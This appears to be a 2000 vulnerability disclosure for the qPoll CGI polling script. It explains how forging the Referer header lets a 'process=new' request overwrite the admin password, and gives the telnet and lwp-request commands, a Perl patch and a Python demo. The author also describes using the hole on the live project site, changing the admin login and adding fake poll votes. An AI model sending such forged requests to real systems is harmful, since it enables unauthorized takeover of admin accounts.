qPoll bug


David Ljung Madison, 9/22/2000:
  I was looking for a web-based voting/survey system for a friend
  of mine and came across qpoll.  I found a security bug with the
  admin login of qpoll, and tried it on the qpoll home page and managed
  to succeed.  This page describes the hack as well as a fix for qpoll.

David Ljung Madison, 10/2/2001:
  The home page for qpoll has disappeared - you can find a copy of
  version 3.1 on Marginal Hacks:
    http://MarginalHacks.com/#qPoll

##################################################

The security hole in qpoll
--------------------------

http://ethereal.virtualave.net/soft/qpoll/demos.html

Qpoll has a security hole in its admin/login page.

First I figured out where the admin program was for the qpoll
homepage: I took the URL of the qpoll cgi script from a sample poll and
replaced the script name with the name of the admin program.

Qpoll relies on HTTP_REFERER for security, which is extremely easy to hack.
HTTP_REFERER is nothing more than the Referer header the client (the
browser) sends, so the server is trusting the client to report the last
page visited, and anyone who can type a request can set it to whatever
they want.  You can fake the HTTP_REFERER value by hand:

--------------------------------------------------
% telnet somedomain.com 80
GET /some/page.html HTTP/1.0
Host: somedomain.com
Referer: http://madeup.com/fake/referer.html

--------------------------------------------------

Even easier, you can automate this with tools that let you specify
headers yourself, such as lwp-request (a.k.a. 'GET'):

% GET -H 'Referer: http://madeup.com/fake/referer.html' http://somedomain.com/some/page.html

The admin form creates a new password file by submitting a
'process=new' request carrying the login/password information.

So we send that form data with a 'PUT' method and a fake referer that
points at the admin script itself.  (Here somedomain.com/cgi-bin/...
stands in for the real URL of the admin script; use the same URL for
the Referer and for the request.  One line, wrapped here.)

% printf 'process=new&name=dave&password=dave' | \
    GET -m PUT -H 'Referer: http://somedomain.com/cgi-bin/qpadmin31.pl' \
        http://somedomain.com/cgi-bin/qpadmin31.pl

So the script gets the form data for a new login, and thinks that it
came from its own admin page.
(For the sake of the creator of qpoll, I used a different login/password)

##################################################

Patch:

This is an easy fix.  The docs say that the only way to change the
password is to remove the password file.  So (in version 3.1) in
qpadmin31.pl we just add a check for that file.  The Registration()
routine has the following:

  if (  ) {
    ...
  } else {
    ...
  }

We simply add:

  if (  ) {
    ...
  } elsif (-e $qpadmin_pswd) {
      &Header("SECURITY NOTICE:  Breakin attempt");
      &Footer();
  } else {
    ...
  }

Note that this does not make the referer check itself any stronger; it
just stops a 'process=new' request from overwriting an existing password
file, which is all the forged referer bought us here.  With the check in
place, the only possible breakin would be during the race condition
between removing the password file and logging in for the first time,
which would be difficult to hit and immediately obvious to the admin.
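To make the hole and the patch concrete, here is an added example (not qpoll's
code, and a Python stand-in for the Perl in qpadmin31.pl).  It builds the raw
request a client can send with any Referer it likes, shows how a CGI gateway
turns that header into HTTP_REFERER verbatim, and runs the 'process=new' form
data through two toy handlers: one modeled on the referer-only gate, and one
with the '-e $qpadmin_pswd' check from the patch above.  The admin URL, the
password file format, and the exact shape of the referer check are all
assumptions, and the existing "admin:secret" login is constructed.

```python
import os
import tempfile
from urllib.parse import parse_qs

# Assumed placeholder for the admin script's URL; the real path on the
# qpoll home page is not given on this page.
ADMIN_URL = "http://somedomain.com/cgi-bin/qpadmin31.pl"
ADMIN_PATH = "/cgi-bin/qpadmin31.pl"


def build_request(method, path, host, body="", referer=None):
    """Client side: the raw HTTP/1.0 request telnet or lwp-request would send.
    The Referer line is whatever the client chooses to write."""
    lines = [f"{method} {path} HTTP/1.0", f"Host: {host}"]
    if referer is not None:
        lines.append(f"Referer: {referer}")
    if body:
        lines.append("Content-Type: application/x-www-form-urlencoded")
        lines.append(f"Content-Length: {len(body)}")
    return "\r\n".join(lines) + "\r\n\r\n" + body


def cgi_env(raw):
    """Server side: a minimal CGI gateway mapping headers to HTTP_* variables.
    HTTP_REFERER is nothing more than the Referer header, copied verbatim."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    env = {"REQUEST_METHOD": method, "SCRIPT_NAME": path}
    for line in header_lines:
        name, _, value = line.partition(":")
        env["HTTP_" + name.strip().upper().replace("-", "_")] = value.strip()
    return env, body


def _write_password_file(form, pswd_file):
    # Assumed "name:password" layout; qpoll's real file format is not shown.
    with open(pswd_file, "w") as f:
        f.write(f"{form['name']}:{form['password']}\n")


def registration_vulnerable(env, body, pswd_file):
    """Models the referer-only gate (assumed to be a substring match): a request
    whose HTTP_REFERER names the admin script is trusted, so process=new
    overwrites the password file unconditionally."""
    if ADMIN_URL not in env.get("HTTP_REFERER", ""):
        return "rejected: bad referer"
    form = {k: v[0] for k, v in parse_qs(body).items()}
    if form.get("process") != "new":
        return "ignored"
    _write_password_file(form, pswd_file)
    return "password file written"


def registration_patched(env, body, pswd_file):
    """Same gate plus the page's fix: refuse a new registration while a
    password file already exists (the -e $qpadmin_pswd branch)."""
    if ADMIN_URL not in env.get("HTTP_REFERER", ""):
        return "rejected: bad referer"
    form = {k: v[0] for k, v in parse_qs(body).items()}
    if form.get("process") != "new":
        return "ignored"
    if os.path.exists(pswd_file):
        return "SECURITY NOTICE: Breakin attempt"
    _write_password_file(form, pswd_file)
    return "password file written"


def demo():
    """Run the same forged-referer request against both handlers."""
    body = "process=new&name=dave&password=dave"
    plain = build_request("POST", ADMIN_PATH, "somedomain.com", body)
    forged = build_request("POST", ADMIN_PATH, "somedomain.com", body, referer=ADMIN_URL)
    results = {}
    with tempfile.TemporaryDirectory() as d:
        pswd = os.path.join(d, "qpadmin.pswd")
        with open(pswd, "w") as f:
            f.write("admin:secret\n")  # constructed: the site's existing admin login

        results["vuln_no_referer"] = registration_vulnerable(*cgi_env(plain), pswd)
        results["vuln_forged"] = registration_vulnerable(*cgi_env(forged), pswd)
        results["vuln_file"] = open(pswd).read()

        with open(pswd, "w") as f:
            f.write("admin:secret\n")  # restore, then try the patched handler
        results["patched_forged"] = registration_patched(*cgi_env(forged), pswd)
        results["patched_file"] = open(pswd).read()

        os.remove(pswd)  # the documented way to reset the password
        results["patched_after_removal"] = registration_patched(*cgi_env(forged), pswd)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The forged request overwrites the existing login in the vulnerable handler and
is refused by the patched one; only after the file is removed (the race window
the text mentions) does the patched handler accept a fresh registration.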


##################################################

Changes I made at the qpoll home page (so they can be reversed):

http://ethereal.virtualave.net/soft/qpoll/music.html:  (Poll #4)
  Added "David Ljung Madison" entry to bottom with many votes

I also changed the admin login/password, of course.  The old login can't
be retrieved through this security hole, only changed.

##################################################

I emailed the creator of qpoll, Taro Sato about the bug and he's a great guy:

--
> Oh man, it's so nice of you to let me know.  I'm actually in the 
> process of rewriting the whole code from scratch, although slowed by 
> various school related tasks.  There should be more improvements.  I 
> hope I'll come up with a more solid code.  Meanwhile I'll try 
> releasing a patch ASAP.
> 
> I'm thankful enough that I even want to mention your name in special 
> thanks and stuff, but i guess you want to retain something of 
> anonymity???
> 
> Thank you for your time,
> Taro
--

And he even managed to flatter me when we discussed changes to qpoll,
which gets him plenty of props as well:

--
> If I do end up adding IP check, I hope it will stand a challenge from 
> a guy like you (I don't mean it.  I know you can find any glitch).  :)
> 
> Anyway, it was really a cool suggestion from a guy from Transmeta.  
> Hopefully, it'll save and protect many users, and for that I am very 
> grateful.  I tell you, but even this kind of little program gets 
> downloaded many times, so even with the "AS IS" warranty, you feel 
> quite a bit of responsibility for it.  I'd take a little humor if it 
> saves users.
--

Great sense of software ownership - we need more coders like that.  :)